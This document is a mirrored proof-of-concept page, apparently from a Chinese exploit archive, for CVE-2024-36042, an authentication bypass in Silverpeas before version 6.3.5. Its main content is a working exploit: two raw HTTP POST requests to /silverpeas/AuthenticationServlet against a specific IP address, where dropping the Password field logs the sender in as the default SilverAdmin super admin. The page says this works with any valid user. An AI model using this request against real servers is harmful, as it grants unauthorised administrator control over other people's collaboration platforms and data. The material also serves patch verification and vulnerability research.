关联漏洞
标题:Silverpeas 安全漏洞 (CVE-2024-36042)Description:Silverpeas是一套开源的业务协作平台。该平台包括项目管理、博客、论坛和文档管理等应用程序。 Silverpeas 6.3.5 之前版本存在安全漏洞,该漏洞源于允许通过 AuthenticationServlet 的 Password 字段来绕过身份验证,为未经身份验证的用户提供超级管理员访问权限。
Description
CVE-2024-36042 Silverpeas authentication bypass vulnerability #Silverpeas #vulnerability #authentication
介绍
# CVE-2024-36042
CVE-2024-36042 Silverpeas authentication bypass vulnerability #Silverpeas #vulnerability #authentication
## Firstly we must identify is that vulnerable version.
All versions prior to 6.3.5 are vulnerable (i.e., version 6.3.4 and earlier). if the sender omits the password form field, the application will sign you in as the user specified without any challenge.
## The standard login request will look like this in Burp Suite:
```
POST /silverpeas/AuthenticationServlet HTTP/2
Host: 212.129.58.88
Content-Length: 28
Origin: https://212.129.58.88
Content-Type: application/x-www-form-urlencoded
Login=SilverAdmin&Password=SilverAdmin&DomainId=0
```
This will fail login (unless they have forgotten to change the default password) and you will be redirected back to the login page with an error code.
## But if you remove the password field like this:
```
POST /silverpeas/AuthenticationServlet HTTP/2
Host: 212.129.58.88
Content-Length: 28
Origin: https://212.129.58.88
Content-Type: application/x-www-form-urlencoded
Login=SilverAdmin&DomainId=0
```
Then the login attempt will (usually) succeed and redirect you to the main page, now logged in as a super admin.
The bug works with any valid user, but SilverAdmin is the default super admin.
Engoy !
文件快照
[4.0K] /data/pocs/0d7cd40be279f5756ddc7ead2e1e871a8814afd4
├── [ 82K] evidance.png
├── [1.3K] README.md
└── [ 82K] Screenshot 2025-08-20 003647.png
0 directories, 3 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。